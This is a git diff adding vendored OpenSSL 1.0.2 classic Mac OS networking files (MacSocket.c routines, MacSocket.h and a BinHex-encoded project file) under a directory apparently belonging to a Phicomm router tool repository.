+
+	theSocketStruct->mAssignedAddrInfo = (TBind *) ::OTAlloc(theSocketStruct->mEndPointRef,T_BIND,T_ADDR,&theOTResult);
+																				
+	SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_connect: Can't allocate OT T_BIND structure, OTAlloc() = ",theOTResult);
+	SetErrorMessageAndBailIfNil(theSocketStruct->mAssignedAddrInfo,"MacSocket_connect: Can't allocate OT T_BIND structure, OTAlloc() returned nil");
+
+
+	theSocketStruct->mRemoteAddrInfo = (TCall *) ::OTAlloc(theSocketStruct->mEndPointRef,T_CALL,T_ADDR,&theOTResult);
+																				
+	SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_connect: Can't allocate OT T_CALL structure, OTAlloc() = ",theOTResult);
+	SetErrorMessageAndBailIfNil(theSocketStruct->mRemoteAddrInfo,"MacSocket_connect: Can't allocate OT T_CALL structure, OTAlloc() returned nil");
+
+	
+	PrepareForAsyncOperation(theSocketStruct,T_BINDCOMPLETE);
+
+	theOTResult = ::OTBind(theSocketStruct->mEndPointRef,nil,theSocketStruct->mAssignedAddrInfo);
+																				
+	SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_connect: Can't bind OT endpoint, OTBind() = ",theOTResult);
+	
+	BailIfError(MyBusyWait(theSocketStruct,false,&theOTResult,&(theSocketStruct->mReceivedTBindComplete)));
+																				
+	SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_connect: Can't bind OT endpoint, OTBind() = ",theOTResult);
+	
+	theSocketStruct->mEndpointIsBound = true;
+	
+
+TCall		sndCall;
+DNSAddress 	hostDNSAddress;
+	
+	//	Set up target address
+	
+	sndCall.addr.buf = (UInt8 *) &hostDNSAddress;
+	sndCall.addr.len = ::OTInitDNSAddress(&hostDNSAddress,inTargetAddressAndPort);
+	sndCall.opt.buf = nil;
+	sndCall.opt.len = 0;
+	sndCall.udata.buf = nil;
+	sndCall.udata.len = 0;
+	sndCall.sequence = 0;
+		
+	//	Connect!
+	
+	PrepareForAsyncOperation(theSocketStruct,T_CONNECT);
+
+	theOTResult = ::OTConnect(theSocketStruct->mEndPointRef,&sndCall,nil);
+	
+	if (theOTResult == kOTNoDataErr)
+	{
+		theOTResult = noErr;
+	}
+												
+	SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_connect: Can't connect OT endpoint, OTConnect() = ",theOTResult);
+	
+	BailIfError(MyBusyWait(theSocketStruct,false,&theOTResult,&(theSocketStruct->mReceivedTConnect)));
+	
+	if (theOTResult == kMacSocket_TimeoutErr)
+	{
+		SetErrorMessageAndBail("MacSocket_connect: Can't connect OT endpoint, OTConnect() = kMacSocket_TimeoutErr");
+	}
+	
+	else
+	{
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_connect: Can't connect OT endpoint, OTConnect() = ",theOTResult);
+	}
+
+	theOTResult = ::OTRcvConnect(theSocketStruct->mEndPointRef,nil);
+												
+	SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_connect: Can't complete connect on OT endpoint, OTRcvConnect() = ",theOTResult);
+
+
+	errCode = noErr;
+
+
+#ifdef MACSOCKET_DEBUG
+	printf("MacSocket_connect: connect completed\n");
+#endif
+
+EXITPOINT:
+	
+	if (theSocketStruct != nil)
+	{
+		theSocketStruct->mLastError = noErr;
+		
+		CopyCStrToCStr("",theSocketStruct->mErrMessage,sizeof(theSocketStruct->mErrMessage));
+
+		if (errCode != noErr)
+		{
+			theSocketStruct->mLastError = errCode;
+			
+			CopyCStrToCStr(GetErrorMessage(),theSocketStruct->mErrMessage,sizeof(theSocketStruct->mErrMessage));
+		}
+	}
+	
+	errno = errCode;
+	
+	return(errCode);
+}
+
+
+
+
+//	Close a connection
+
+OSErr MacSocket_close(const int inSocketNum)
+{
+OSErr			errCode = noErr;
+SocketStruct	*theSocketStruct = nil;
+
+
+	if (!SocketIndexIsValid(inSocketNum))
+	{
+		SetErrorMessageAndBail("MacSocket_close: Invalid socket number specified");
+	}
+
+
+	theSocketStruct = &(sSockets[inSocketNum]);
+	
+	if (theSocketStruct->mEndPointRef != kOTInvalidEndpointRef)
+	{
+	OTResult		theOTResult = noErr;
+	
+		//	Try to play nice
+		
+		if (theSocketStruct->mReceivedTOrdRel)
+		{
+			//	Already did an OTRcvOrderlyDisconnect() in the notifier
+		
+			if (theSocketStruct->mLocalEndIsConnected)
+			{
+				theOTResult = ::OTSndOrderlyDisconnect(theSocketStruct->mEndPointRef);
+				
+				theSocketStruct->mLocalEndIsConnected = false;
+			}
+		}
+		
+		else if (theSocketStruct->mLocalEndIsConnected)
+		{
+			theOTResult = ::OTSndOrderlyDisconnect(theSocketStruct->mEndPointRef);
+			
+			theSocketStruct->mLocalEndIsConnected = false;
+			
+			//	Wait for other end to hang up too!
+			
+//			PrepareForAsyncOperation(theSocketStruct,T_ORDREL);
+//
+//			errCode = MyBusyWait(theSocketStruct,false,&theOTResult,&(theSocketStruct->mReceivedTOrdRel));
+		}
+		
+		
+		if (theOTResult != noErr)
+		{
+			::OTCloseProvider(theSocketStruct->mEndPointRef);
+		}
+		
+		else
+		{
+			theOTResult = ::OTCloseProvider(theSocketStruct->mEndPointRef);
+		}
+
+		theSocketStruct->mEndPointRef = kOTInvalidEndpointRef;
+		
+		errCode = theOTResult;
+	}
+
+
+	theSocketStruct->mIsInUse = false;
+
+	
+EXITPOINT:
+	
+	if (theSocketStruct != nil)
+	{
+		theSocketStruct->mLastError = noErr;
+		
+		CopyCStrToCStr("",theSocketStruct->mErrMessage,sizeof(theSocketStruct->mErrMessage));
+
+		if (errCode != noErr)
+		{
+			theSocketStruct->mLastError = errCode;
+			
+			CopyCStrToCStr(GetErrorMessage(),theSocketStruct->mErrMessage,sizeof(theSocketStruct->mErrMessage));
+		}
+	}
+
+	errno = errCode;
+		
+	return(errCode);
+}
+
+
+
+
+//	Receive some bytes
+
+int MacSocket_recv(const int inSocketNum,void *outBuff,int outBuffLength,const Boolean inBlock)
+{
+OSErr			errCode = noErr;
+int				totalBytesRead = 0;
+SocketStruct	*theSocketStruct = nil;
+
+	
+	SetErrorMessageAndBailIfNil(outBuff,"MacSocket_recv: Bad parameter, outBuff = nil");
+	
+	if (outBuffLength <= 0)
+	{
+		SetErrorMessageAndBail("MacSocket_recv: Bad parameter, outBuffLength <= 0");
+	}
+	
+	if (!SocketIndexIsValid(inSocketNum))
+	{
+		SetErrorMessageAndBail("MacSocket_recv: Invalid socket number specified");
+	}
+
+	theSocketStruct = &(sSockets[inSocketNum]);
+
+	if (!theSocketStruct->mLocalEndIsConnected)
+	{
+		SetErrorMessageAndBail("MacSocket_recv: Socket not connected");
+	}
+
+	if (theSocketStruct->mReceivedTOrdRel)
+	{
+		totalBytesRead = 0;
+		
+		goto EXITPOINT;
+	}
+
+	
+	PrepareForAsyncOperation(theSocketStruct,0);
+	
+	for (;;)
+	{
+	int			bytesRead;
+	OTResult	theOTResult;
+	
+	
+		theOTResult = ::OTRcv(theSocketStruct->mEndPointRef,(void *) ((unsigned long) outBuff + (unsigned long) totalBytesRead),outBuffLength - totalBytesRead,nil);
+		
+		if (theOTResult >= 0)
+		{
+			bytesRead = theOTResult;
+			
+#ifdef MACSOCKET_DEBUG
+	printf("MacSocket_recv: read %d bytes in part\n",bytesRead);
+#endif
+		}
+		
+		else if (theOTResult == kOTNoDataErr)
+		{
+			bytesRead = 0;
+		}
+		
+		else
+		{
+			SetErrorMessageAndLongIntAndBail("MacSocket_recv: Can't receive OT data, OTRcv() = ",theOTResult);
+		}
+		
+		
+		totalBytesRead += bytesRead;
+		
+		
+		if (totalBytesRead <= 0)
+		{
+			if (theSocketStruct->mReceivedTOrdRel)
+			{
+				break;
+			}
+			
+			//	This seems pretty stupid to me now.  Maybe I'll delete this blocking garbage.
+			
+			if (inBlock)
+			{
+				if (TimeoutElapsed(theSocketStruct))
+				{
+					SetErrorCodeAndMessageAndBail(kMacSocket_TimeoutErr,"MacSocket_recv: Receive operation timed-out");
+				}
+				
+				if (theSocketStruct->mIdleWaitCallback != nil)
+				{
+					theOTResult = (*(theSocketStruct->mIdleWaitCallback))(theSocketStruct->mUserRefPtr);
+					
+					SetErrorMessageAndBailIfError(theOTResult,"MacSocket_recv: User cancelled operation");
+				}
+				
+				continue;
+			}
+		}
+		
+		
+		break;
+	}
+	
+	errCode = noErr;
+
+
+#ifdef MACSOCKET_DEBUG
+	printf("MacSocket_recv: read %d bytes in total\n",totalBytesRead);
+#endif
+	
+	
+EXITPOINT:
+	
+	if (theSocketStruct != nil)
+	{
+		theSocketStruct->mLastError = noErr;
+		
+		CopyCStrToCStr("",theSocketStruct->mErrMessage,sizeof(theSocketStruct->mErrMessage));
+
+		if (errCode != noErr)
+		{
+			theSocketStruct->mLastError = errCode;
+			
+			CopyCStrToCStr(GetErrorMessage(),theSocketStruct->mErrMessage,sizeof(theSocketStruct->mErrMessage));
+		}
+	}
+
+	errno = errCode;
+	
+	return(totalBytesRead);
+}
+
+
+
+//	Send some bytes
+
+int MacSocket_send(const int inSocketNum,const void *inBuff,int inBuffLength)
+{
+OSErr			errCode = noErr;
+int				bytesSent = 0;
+SocketStruct	*theSocketStruct = nil;
+
+
+	SetErrorMessageAndBailIfNil(inBuff,"MacSocket_send: Bad parameter, inBuff = nil");
+	
+	if (inBuffLength <= 0)
+	{
+		SetErrorMessageAndBail("MacSocket_send: Bad parameter, inBuffLength <= 0");
+	}
+
+	if (!SocketIndexIsValid(inSocketNum))
+	{
+		SetErrorMessageAndBail("MacSocket_send: Invalid socket number specified");
+	}
+	
+
+	theSocketStruct = &(sSockets[inSocketNum]);
+	
+	if (!theSocketStruct->mLocalEndIsConnected)
+	{
+		SetErrorMessageAndBail("MacSocket_send: Socket not connected");
+	}
+
+
+OTResult		theOTResult;
+	
+
+	PrepareForAsyncOperation(theSocketStruct,0);
+
+	while (bytesSent < inBuffLength)
+	{
+		if (theSocketStruct->mIdleWaitCallback != nil)
+		{
+			theOTResult = (*(theSocketStruct->mIdleWaitCallback))(theSocketStruct->mUserRefPtr);
+			
+			SetErrorMessageAndBailIfError(theOTResult,"MacSocket_send: User cancelled");
+		}
+
+
+		theOTResult = ::OTSnd(theSocketStruct->mEndPointRef,(void *) ((unsigned long) inBuff + bytesSent),inBuffLength - bytesSent,0);
+		
+		if (theOTResult >= 0)
+		{
+			bytesSent += theOTResult;
+			
+			theOTResult = noErr;
+			
+			//	Reset timer....
+			
+			PrepareForAsyncOperation(theSocketStruct,0);
+		}
+		
+		if (theOTResult == kOTFlowErr)
+		{
+			if (TimeoutElapsed(theSocketStruct))
+			{
+				SetErrorCodeAndMessageAndBail(kMacSocket_TimeoutErr,"MacSocket_send: Send timed-out")
+			}
+
+			theOTResult = noErr;
+		}
+													
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_send: Can't send OT data, OTSnd() = ",theOTResult);
+	}
+
+	
+	errCode = noErr;
+
+#ifdef MACSOCKET_DEBUG
+	printf("MacSocket_send: sent %d bytes\n",bytesSent);
+#endif
+	
+	
+EXITPOINT:
+	
+	if (theSocketStruct != nil)
+	{
+		theSocketStruct->mLastError = noErr;
+		
+		CopyCStrToCStr("",theSocketStruct->mErrMessage,sizeof(theSocketStruct->mErrMessage));
+
+		if (errCode != noErr)
+		{
+			theSocketStruct->mLastError = errCode;
+			
+			CopyCStrToCStr(GetErrorMessage(),theSocketStruct->mErrMessage,sizeof(theSocketStruct->mErrMessage));
+		}
+	}
+	
+	if (errCode != noErr)
+	{
+		::SysBeep(1);
+	}
+	
+	errno = errCode;
+	
+	return(bytesSent);
+}
+
+
+
+
+
+static OSStatus NegotiateIPReuseAddrOption(EndpointRef inEndpoint,const Boolean inEnableReuseIP)
+{
+OSStatus	errCode;
+UInt8		buf[kOTFourByteOptionSize];
+TOption*	theOTOption;
+TOptMgmt	theOTRequest;
+TOptMgmt	theOTResult;
+	
+
+	if (!OTIsSynchronous(inEndpoint))
+	{
+		SetErrorMessageAndBail("NegotiateIPReuseAddrOption: Open Transport endpoint is not synchronous");
+	}
+	
+	theOTRequest.opt.buf = buf;
+	theOTRequest.opt.len = sizeof(buf);
+	theOTRequest.flags = T_NEGOTIATE;
+
+	theOTResult.opt.buf = buf;
+	theOTResult.opt.maxlen = kOTFourByteOptionSize;
+
+
+	theOTOption = (TOption *) buf;
+	
+	theOTOption->level = INET_IP;
+	theOTOption->name = IP_REUSEADDR;
+	theOTOption->len = kOTFourByteOptionSize;
+	theOTOption->status = 0;
+	*((UInt32 *) (theOTOption->value)) = inEnableReuseIP;
+
+	errCode = ::OTOptionManagement(inEndpoint,&theOTRequest,&theOTResult);
+	
+	if (errCode == kOTNoError)
+	{
+		if (theOTOption->status != T_SUCCESS)
+		{
+			errCode = theOTOption->status;
+		}
+		
+		else
+		{
+			errCode = kOTNoError;
+		}
+	}
+				
+
+EXITPOINT:
+	
+	errno = errCode;
+	
+	return(errCode);
+}
+
+
+
+
+
+//	Some rough notes....
+
+
+
+//	OTAckSends(ep);
+//	OTAckSends(ep) // enable AckSend option
+//	......
+//	buf = OTAllocMem( nbytes); // Allocate nbytes of memory from OT
+//	OTSnd(ep, buf, nbytes, 0); // send a packet
+//	......
+//	NotifyProc( .... void* theParam) // Notifier Proc
+//	case T_MEMORYRELEASED: // process event
+//	OTFreeMem( theParam); // free up memory
+//	break;
+
+
+
+/*
+struct InetInterfaceInfo
+{
+	InetHost		fAddress;
+	InetHost		fNetmask;
+	InetHost		fBroadcastAddr;
+	InetHost		fDefaultGatewayAddr;
+	InetHost		fDNSAddr;
+	UInt16			fVersion;
+	UInt16			fHWAddrLen;
+	UInt8*			fHWAddr;
+	UInt32			fIfMTU;
+	UInt8*			fReservedPtrs[2];
+	InetDomainName	fDomainName;
+	UInt32			fIPSecondaryCount;
+	UInt8			fReserved[252];			
+};
+typedef struct InetInterfaceInfo InetInterfaceInfo;
+
+
+
+((InetAddress *) addr.buf)->fHost
+
+struct TBind
+{
+	TNetbuf	addr;
+	OTQLen	qlen;
+};
+
+typedef struct TBind	TBind;
+
+struct TNetbuf
+{
+	size_t	maxlen;
+	size_t	len;
+	UInt8*	buf;
+};
+
+typedef struct TNetbuf	TNetbuf;
+
+	
+	struct InetAddress
+{
+		OTAddressType	fAddressType;	// always AF_INET
+		InetPort		fPort;			// Port number 
+		InetHost		fHost;			// Host address in net byte order
+		UInt8			fUnused[8];		// Traditional unused bytes
+};
+typedef struct InetAddress InetAddress;
+*/
+
+
+
+/*
+static pascal void Notifier(void* context, OTEventCode event, OTResult result, void* cookie)
+{
+EPInfo* epi = (EPInfo*) context;
+
+	switch (event)
+	{
+		case T_LISTEN:
+		{
+			DoListenAccept();
+			return;
+		}
+		
+		case T_ACCEPTCOMPLETE:
+		{
+			if (result != kOTNoError)
+				DBAlert1("Notifier: T_ACCEPTCOMPLETE - result %d",result);
+			return;
+		}
+		
+		case T_PASSCON:
+		{
+			if (result != kOTNoError)
+			{
+				DBAlert1("Notifier: T_PASSCON result %d", result);
+				return;
+			}
+
+			OTAtomicAdd32(1, &gCntrConnections);
+			OTAtomicAdd32(1, &gCntrTotalConnections);
+			OTAtomicAdd32(1, &gCntrIntervalConnects);
+			
+			if ( OTAtomicSetBit(&epi->stateFlags, kPassconBit) != 0 )
+			{
+				ReadData(epi);
+			}
+			
+			return;
+		}
+		
+		case T_DATA:
+		{
+			if ( OTAtomicSetBit(&epi->stateFlags, kPassconBit) != 0 )
+			{
+				ReadData(epi);
+			}
+			
+			return;
+		}
+		
+		case T_GODATA:
+		{
+			SendData(epi);
+			return;
+		}
+		
+		case T_DISCONNECT:
+		{
+			DoRcvDisconnect(epi);
+			return;
+		}
+		
+		case T_DISCONNECTCOMPLETE:
+		{
+			if (result != kOTNoError)
+				DBAlert1("Notifier: T_DISCONNECT_COMPLETE result %d",result);
+				
+			return;
+		}
+		
+		case T_MEMORYRELEASED:
+		{
+			OTAtomicAdd32(-1, &epi->outstandingSends);
+			return;
+		}
+		
+		default:
+		{
+			DBAlert1("Notifier: unknown event <%x>", event);
+			return;
+		}
+	}
+}
+*/
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/MacSocket.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/MacSocket.h
new file mode 100644
index 0000000..155d40d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/MacSocket.h
@@ -0,0 +1,104 @@
+#pragma once
+
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+enum {
+    kMacSocket_TimeoutErr = -2
+};
+
+// Since MacSocket does busy waiting, I do a callback while waiting
+
+typedef OSErr(*MacSocket_IdleWaitCallback) (void *);
+
+// Call this before anything else!
+
+OSErr MacSocket_Startup(void);
+
+// Call this to cleanup before quitting
+
+OSErr MacSocket_Shutdown(void);
+
+// Call this to allocate a "socket" (reference number is returned in
+// outSocketNum)
+// Note that inDoThreadSwitching is pretty much irrelevant right now, since I
+// ignore it
+// The inTimeoutTicks parameter is applied during reads/writes of data
+// The inIdleWaitCallback parameter specifies a callback which is called
+// during busy-waiting periods
+// The inUserRefPtr parameter is passed back to the idle-wait callback
+
+OSErr MacSocket_socket(int *outSocketNum, const Boolean inDoThreadSwitching,
+                       const long inTimeoutTicks,
+                       MacSocket_IdleWaitCallback inIdleWaitCallback,
+                       void *inUserRefPtr);
+
+// Call this to connect to an IP/DNS address
+// Note that inTargetAddressAndPort is in "IP:port" format-- e.g.
+// 10.1.1.1:123
+
+OSErr MacSocket_connect(const int inSocketNum, char *inTargetAddressAndPort);
+
+// Call this to listen on a port
+// Since this a low-performance implementation, I allow a maximum of 1 (one!)
+// incoming request when I listen
+
+OSErr MacSocket_listen(const int inSocketNum, const int inPortNum);
+
+// Call this to close a socket
+
+OSErr MacSocket_close(const int inSocketNum);
+
+// Call this to receive data on a socket
+// Most parameters' purpose are obvious-- except maybe "inBlock" which
+// controls whether I wait for data or return immediately
+
+int MacSocket_recv(const int inSocketNum, void *outBuff, int outBuffLength,
+                   const Boolean inBlock);
+
+// Call this to send data on a socket
+
+int MacSocket_send(const int inSocketNum, const void *inBuff,
+                   int inBuffLength);
+
+// If zero bytes were read in a call to MacSocket_recv(), it may be that the
+// remote end has done a half-close
+// This function will let you check whether that's true or not
+
+Boolean MacSocket_RemoteEndIsClosing(const int inSocketNum);
+
+// Call this to see if the listen has completed after a call to
+// MacSocket_listen()
+
+Boolean MacSocket_ListenCompleted(const int inSocketNum);
+
+// These really aren't very useful anymore
+
+Boolean MacSocket_LocalEndIsOpen(const int inSocketNum);
+Boolean MacSocket_RemoteEndIsOpen(const int inSocketNum);
+
+// You may wish to change the userRefPtr for a socket callback-- use this to
+// do it
+
+void MacSocket_SetUserRefPtr(const int inSocketNum, void *inNewRefPtr);
+
+// Call these to get the socket's IP:port descriptor
+
+void MacSocket_GetLocalIPAndPort(const int inSocketNum, char *outIPAndPort,
+                                 const int inIPAndPortLength);
+void MacSocket_GetRemoteIPAndPort(const int inSocketNum, char *outIPAndPort,
+                                  const int inIPAndPortLength);
+
+// Call this to get error info from a socket
+
+void MacSocket_GetSocketErrorInfo(const int inSocketNum,
+                                  int *outSocketErrCode,
+                                  char *outSocketErrString,
+                                  const int inSocketErrStringMaxLength);
+
+
+#ifdef __cplusplus
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/OpenSSL.mcp.hqx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/OpenSSL.mcp.hqx
new file mode 100644
index 0000000..c357ea5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/OpenSSL.mcp.hqx
@@ -0,0 +1,4940 @@
+(This file must be converted with BinHex 4.0)
+
+:#dp`C@j68d`ZE@0`!%e08(*$9dP&!!!!!jeU!!!!!0U2Bfp[E!!!!!-!!!%S!!1
+%3J!$K@S!!"J!!!!"!!%#!3!!!!!!!!!!!%0[C'9ABA*bD@pb)&"bEfTPBh3!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"(CA4)9&4
+38b"38%-k4'9LG@GRCA)J8R9ZG'PYC3"(CA4)9&438b"38%-k8fpeFQ0P)&4bC@9
+c!%GPG%K89&"6)&"33cT$GA0dEfdJ5f9jGfpbC(-!4f9d5&488&-J8&"$1N&MBf9
+cFb"3BA4SF`"(CA4)9&438b"38%-k9'&bCf9d)&0PG(4TEQGc!%GPG%K89&"6)&"
+33cT'D@aP)%eKF("TEQGc!%GPG%K89&"6)&"33cT#G@PXC#"&H(4bBA-!4f9d5&4
+88&-J8&"$1N4PBR9RCf9b)&4KFQGPG!"(CA4)9&438b"38%-k0MK,)%0[C'9(C@i
+!4f9d5&488&-J8&"$1MBi5b"%DA0KFh0PE@*XCA)!4f9d5&488&-J8&"$1MBi5b"
+(E'pLB@`J6h"dD@eTHQ9b!%GPG%K89&"6)&"33cSf1%XJ6'PZDf9b!%GPG%K89&"
+6)&"33cSf1%XJ8(*[DQ9MG!"(CA4)9&438b"38%-k3bp$+bXJ3fpYF'PXCA)!4f9
+d5&488&-J8&"$1N-[3bXV)&GKFQjTEQGc!%GPG%K89&"6)&"33cT$4Ndf1%X!4f9
+d5&488&-J8&"$1NeKBdp6)%ePFQGP)&"KEQ9X!%GPG%K89&"6)&"33cT38%-J3fp
+NC8GPEJ"(CA4)9&438b"38%-k8&"$)%4TFf&cFf9YBQaPFJ"(CA4)9&438b"38%-
+k8&"$)%GXEf*KE#"2F(4TE@PkCA)!4f9d5&488&-J8&"$1P"33b"-D@jVCA)!4f9
+d5&488&-J8&"$1P"33b"348B!4f9d5&488&-J8&"$1P"33b"3FQpUC@0d!%GPG%K
+89&"6)&"33cT38%0"FfdJ8'&ZC@`!4f9d5&488&-J8&"$1P*PHL"$Efe`D@aPFJ"
+2F'9Z8e0-)&"33cT%C@*eCfGPFL"5G@jdD@eP!%p`C@j68d`J8&"$1P0[GA*MC5"
+8FQ9PF`"2F'9Z8e0-)&"33cT$GA0dEfdJ5f9jGfpbC(-!6h"PEP066#"38%-k3@0
+MCA0c)&"KG'Kc!%p`C@j68d`J8&"$1P4KFQGPG#"6CA4dD@jRF`"2F'9Z8e0-)&"
+33cT'D@aP)%eKF("TEQGc!%p`C@j68d`J8&"$1N*eD@aN)%9iG(*KF`"2F'9Z8e0
+-)&"33cT%C@*eCfGPFL"8BA*RCA3!6h"PEP066#"38%-k0MK,)%0[C'9(C@i!6h"
+PEP066#"38%-k0MK,)%4TFf&cFf9YBQaPFJ"2F'9Z8e0-)&"33cSf1%XJ4fa[BQ&
+X)%p`G'PYDATPFJ"2F'9Z8e0-)&"33cSf1%XJ6'PZDf9b!%p`C@j68d`J8&"$1MB
+i5b"3FQpUC@0d!%p`C@j68d`J8&"$1N-[3bXV)%0[EA"TE'9b!%p`C@j68d`J8&"
+$1N-[3bXV)&GKFQjTEQGc!%p`C@j68d`J8&"$1N0'66Bi5`"2F'9Z8e0-)&"33cT
+0B@028b"0CA*RC5"3B@jPE!"2F'9Z8e0-)&"33cT38%-J3fpNC8GPEJ"2F'9Z8e0
+-)&"33cT38%-J4'PcBA0cC@eLE'9b!%p`C@j68d`J8&"$1P"33b"(E'pLB@`J6h"
+dD@eTHQ9b!%p`C@j68d`J8&"$1P"33b"-D@jVCA)!6h"PEP066#"38%-k8&"$)&"
+&4J"2F'9Z8e0-)&"33cT38%-J8(*[DQ9MG!"2F'9Z8e0-)&"33cT38%0"FfdJ8'&
+ZC@`!6h"PEP066#"38%-k8Q9k)%0[EA"TE'9b!%GPG%K89&"6)$Bi5cT%C@*eCfG
+PFL"5G@jdD@eP!%GPG%K89&"6)$Bi5cT6Eh9bBf8J9(*PCA-!4f9d5&488&-J0MK
+,1N0eFh4[E5",CAPhEh*NF`"(CA4)9&438b!f1%Xk3@0MCA0c)&"KG'Kc!%GPG%K
+89&"6)$Bi5cT8BA*RCA3J8f9dG'PZCh-!4f9d5&488&-J0MK,1NCTE'8J6@&`F'P
+ZCh-!4f9d5&488&-J0MK,1N*eD@aN)%9iG(*KF`"(CA4)9&438b!f1%Xk4'9LG@G
+RCA)J9'&bCf9d!%GPG%K89&"6)$Bi5cSf1%XJ3fpNC8GPEJ"(CA4)9&438b!f1%X
+k0MK,)%4TFf&cFf9YBQaPFJ"(CA4)9&438b!f1%Xk0MK,)%GXEf*KE#"2F(4TE@P
+kCA)!4f9d5&488&-J0MK,1MBi5b"-D@jVCA)!4f9d5&488&-J0MK,1MBi5b"3FQp
+UC@0d!%GPG%K89&"6)$Bi5cT$,d-V+b"$Efe`D@aPFJ"(CA4)9&438b!f1%Xk3bp
+$+bXJ9f&bEQPZCh-!4f9d5&488&-J0MK,1N0'66Bi5`"(CA4)9&438b!f1%Xk6@&
+M6e-J6@9bCf8J8'&ZC@`!4f9d5&488&-J0MK,1P"33b"$Ef4P4f9Z!%GPG%K89&"
+6)$Bi5cT38%-J4'PcBA0cC@eLE'9b!%GPG%K89&"6)$Bi5cT38%-J4fa[BQ&X)%p
+`G'PYDATPFJ"(CA4)9&438b!f1%Xk8&"$)%aTEQYPFJ"(CA4)9&438b!f1%Xk8&"
+$)&"&4J"(CA4)9&438b!f1%Xk8&"$)&"bEfTPBh3!4f9d5&488&-J0MK,1P"33d&
+cE5"3B@jPE!"(CA4)9&438b!f1%Xk8Q9k)%0[EA"TE'9b!%aTBP066#!f1%Xk4'9
+LG@GRCA)J8R9ZG'PYC3"-D@*68d`J0MK,1P0[GA*MC5"8FQ9PF`"-D@*68d`J0MK
+,1N0eFh4[E5",CAPhEh*NF`"-D@*68d`J0MK,1N&MBf9cFb"3BA4SF`"-D@*68d`
+J0MK,1P4KFQGPG#"6CA4dD@jRF`"-D@*68d`J0MK,1NCTE'8J6@&`F'PZCh-!6'P
+L8e0-)$Bi5cT#G@PXC#"&H(4bBA-!6'PL8e0-)$Bi5cT%C@*eCfGPFL"8BA*RCA3
+!6'PL8e0-)$Bi5cSf1%XJ3fpNC8GPEJ"-D@*68d`J0MK,1MBi5b"%DA0KFh0PE@*
+XCA)!6'PL8e0-)$Bi5cSf1%XJ4fa[BQ&X)%p`G'PYDATPFJ"-D@*68d`J0MK,1MB
+i5b"-D@jVCA)!6'PL8e0-)$Bi5cSf1%XJ8(*[DQ9MG!"-D@*68d`J0MK,1N-[3bX
+V)%0[EA"TE'9b!%aTBP066#!f1%Xk3bp$+bXJ9f&bEQPZCh-!6'PL8e0-)$Bi5cT
+$4Ndf1%X!6'PL8e0-)$Bi5cT0B@028b"0CA*RC5"3B@jPE!"-D@*68d`J0MK,1P"
+33b"$Ef4P4f9Z!%aTBP066#!f1%Xk8&"$)%4TFf&cFf9YBQaPFJ"-D@*68d`J0MK
+,1P"33b"(E'pLB@`J6h"dD@eTHQ9b!%aTBP066#!f1%Xk8&"$)%aTEQYPFJ"-D@*
+68d`J0MK,1P"33b"348B!6'PL8e0-)$Bi5cT38%-J8(*[DQ9MG!"-D@*68d`J0MK
+,1P"33d&cE5"3B@jPE!"-D@*68d`J0MK,1P*PHL"$Efe`D@aPFJ"2F'9Z8e0-)$B
+iDcT%C@*eCfGPFL"5G@jdD@eP!%p`C@j68d`J0MKV1P0[GA*MC5"8FQ9PF`"2F'9
+Z8e0-)$BiDcT$GA0dEfdJ5f9jGfpbC(-!6h"PEP066#!f1'Xk3@0MCA0c)&"KG'K
+c!%p`C@j68d`J0MKV1P4KFQGPG#"6CA4dD@jRF`"2F'9Z8e0-)$BiDcT'D@aP)%e
+KF("TEQGc!%p`C@j68d`J0MKV1N*eD@aN)%9iG(*KF`"2F'9Z8e0-)$BiDcT%C@*
+eCfGPFL"8BA*RCA3!6h"PEP066#!f1'Xk0MK,)%0[C'9(C@i!6h"PEP066#!f1'X
+k0MK,)%4TFf&cFf9YBQaPFJ"2F'9Z8e0-)$BiDcSf1%XJ4fa[BQ&X)%p`G'PYDAT
+PFJ"2F'9Z8e0-)$BiDcSf1%XJ6'PZDf9b!%p`C@j68d`J0MKV1MBi5b"3FQpUC@0
+d!%p`C@j68d`J0MKV1N-[3bXV)%0[EA"TE'9b!%p`C@j68d`J0MKV1N-[3bXV)&G
+KFQjTEQGc!%p`C@j68d`J0MKV1N0'66Bi5`"2F'9Z8e0-)$BiDcT0B@028b"0CA*
+RC5"3B@jPE!"2F'9Z8e0-)$BiDcT38%-J3fpNC8GPEJ"2F'9Z8e0-)$BiDcT38%-
+J4'PcBA0cC@eLE'9b!%p`C@j68d`J0MKV1P"33b"(E'pLB@`J6h"dD@eTHQ9b!%p
+`C@j68d`J0MKV1P"33b"-D@jVCA)!6h"PEP066#!f1'Xk8&"$)&"&4J"2F'9Z8e0
+-)$BiDcT38%-J8(*[DQ9MG!"2F'9Z8e0-)$BiDcT38%0"FfdJ8'&ZC@`!6h"PEP0
+66#!f1'Xk8Q9k)%0[EA"TE'9b!%aTBP066#"38%-k4'9LG@GRCA)J8R9ZG'PYC3"
